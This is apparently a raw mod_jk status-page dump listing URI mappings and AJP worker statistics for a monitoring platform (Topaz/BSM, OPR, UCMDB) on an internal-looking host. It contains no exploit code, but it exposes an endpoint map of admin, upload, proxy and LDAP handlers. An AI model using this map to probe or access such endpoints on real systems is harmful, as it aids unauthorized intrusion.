- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/analytics/PortalsServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/personalization/project/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/analytics/AllerezServer/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/analytics/GroupServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/analytics/AdminServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /axis2/services/UcmdbService/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/analytics/KpiServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/AdminCenter/servlets/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/services/technical/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/services/business/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/analytics/servlet/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/gwt/charts/gwt-log Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/omi/integration/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/slm/customers/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/bam/open_api/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/bsmLight/BPM/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/webtools/gwt/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/rfw/xml/*.xml Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/rfw/xls/*.xls Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/webtools/gwt/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/webtools/gwt/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/rfw/xls/*.xls Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/rfw/xls/*.xls Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/rfw/xml/*.xml Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/rfw/xml/*.xml Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/eum/BPRTransactionDefinitionServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/services/EntityNotificationPort Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/eum/DownloadScriptServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /axis2/services/DiscoveryService Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/eum/DownloadALMZipServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/j2ee/DataCollectorServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /uim/composition_manager/*_srv* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/BacRepositoriesUI/*.rep Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/personalization/project Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/gdeopenapi/GdeOpenApi Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /axis2/services/UcmdbService Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/eum/TCPReportServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/SnapshotServlet/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/monitoring_skin/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/dwrsitescopeodm/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/rca/rcaFrontComp Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/bam/*.bamNoProxy Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/eumreportsapi/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/servicehealth/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/messagebroker/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/omi/integration Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/bpr/BPRServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/bam/BAMOpenApi Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/slm/customers Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/bsmservices/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/diagnostics/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/ldapContext/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/messagebroker/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/messagebroker/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/monitoring/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/bsmLight/BPM Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/eumopenapi/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/dwrrunbook/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/bpmappapi/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/sitescope/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/eumappapi/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/dashboard/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /mercury/dynamic/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/topaz_api/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/bsmLight/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/bam/*.bam Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/tdm/*.tdm Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opal/uibridge/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/dwr-pi/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/siebel/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/appmon/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/acweb/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opal/admin/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/TMS/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/dwr/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/rest/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opal/app/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/SLMGraphCallBackServletVer_41 Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/SymphonyRedirectionServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/OnlineDiagnosticServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/SLMGraphCallBackServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/authorizationmanagment Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/ColorsRetrieverServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/OfflineReportsServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/ConfigurationServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/kpiQueryServiceProxy Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/VTContextMenuServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/authorizationcontrol Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/PrismHandlerServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/OfflineReportsServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/OfflineReportsServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/JapaneseHelpServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /filters/CategoriesServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/VisualFlowMapServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/SLMCallbackServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/ContextMenuServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/businessimpactapi Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/JavaScriptServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /filters/FiltersServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/CMSImagesServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/TopazSiteServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/ContextMenuServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/FrameworkServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/ContextMenuServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/TopazSwitchboard Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/LazyTreeServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/CallbackServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/SlmSiteServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/LegendsServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/TopazSiteServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/FrameworkServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/FrameworkServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/isolateProblem Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/TopazSiteServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/LazyTreeServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opr-config-server/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/LazyTreeServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/servicehealth Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/FlowMapServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /utility_portlets/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opr-admin-server/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/EmailServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /freshwater_skin/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/remoteProxy Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opr-cpdiff-tool/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/bsmservices Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/ldapContext Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /mam-collectors/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /excite-runtime/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/EmailServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/EmailServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/PDFServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /SampleBrowser/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/remoteProxy Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /TopazSettings/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/remoteProxy Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/bpmappapi Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/PDFServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/registerTV Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/download Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/bsmLight Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/PDFServlet Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/gateway Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opr-console/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/kpiapi Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/slaapi Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/download Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/download Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /freshwater/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/upload Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/*.jsp Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /ucmdb-api/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/acweb Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/*.tac Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /dashboard/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/upload Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/upload Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /webinfra/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/*.do Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /rumproxy/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/*.jsp Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/*.jsp Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opr-web/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /uim/*.jsp Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /tvb/*.do Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /excite/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /bpi/*.do Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opr-pm/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /qcbin/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /OVPM/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /mcrs/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /ext/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /cm/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opr-config-server Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opr-admin-server Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opr-cpdiff-tool Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /excite-runtime Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opr-console Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opr-web Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /excite Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opr-pm Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /*.csv Wildchar uriworkermap -1 0 0 - - - - 0
- [S|E|R] Worker Status for wdeWorker
- Type Hostname Address:Port Connection Pool Timeout Connect Timeout Prepost Timeout Reply Timeout Retries Recovery Options Max Packet Size [Hide]
- ajp13 127.0.0.1 127.0.0.1:8010 0 0 0 0 2 0
- State Acc Err CE RE Wr Rd Busy Max Con LR LE
- OK 133834 (0/sec) 0 0 0 2.2P (9.2G/sec) 5.1T (21M/sec) 0 6 25 254433
- URI Mappings for wdeWorker (22 maps) [Hide]
- Server URI Match Type Source Reply Timeout Sticky Ignore Stateless Fail on Status Active Disabled Stopped Use Server Errors
- internalsubsomain.was.here.gm.com:80 /topaz/topaz_api/api_reporttransactions_ex.asp Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/topaz_api/ReportTraceroute.asp Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/topaz_api/reporttraceRoute.asp Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/topaz_api/ReportTraceRoute.asp Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/topaz_api/api_report_ems.asp Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /topaz/topaz_api/api_reportSoa.asp Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /opr-gateway/rest/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /ext/mod_mdrv_wrap.dll Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /opr-gateway/rest Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /axis2/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com:80 /axis2 Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/topaz_api/api_reporttransactions_ex.asp Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/topaz_api/ReportTraceroute.asp Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/topaz_api/reporttraceRoute.asp Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/topaz_api/ReportTraceRoute.asp Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/topaz_api/api_report_ems.asp Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /topaz/topaz_api/api_reportSoa.asp Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opr-gateway/rest/* Wildchar uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /ext/mod_mdrv_wrap.dll Exact uriworkermap -1 0 0 - - - - 0
- internalsubsomain.was.here.gm.com [internalsubsomain.was.here.gm.com:443] /opr-gateway/rest Exact uriworkermap -1 0 0 - - - - 0
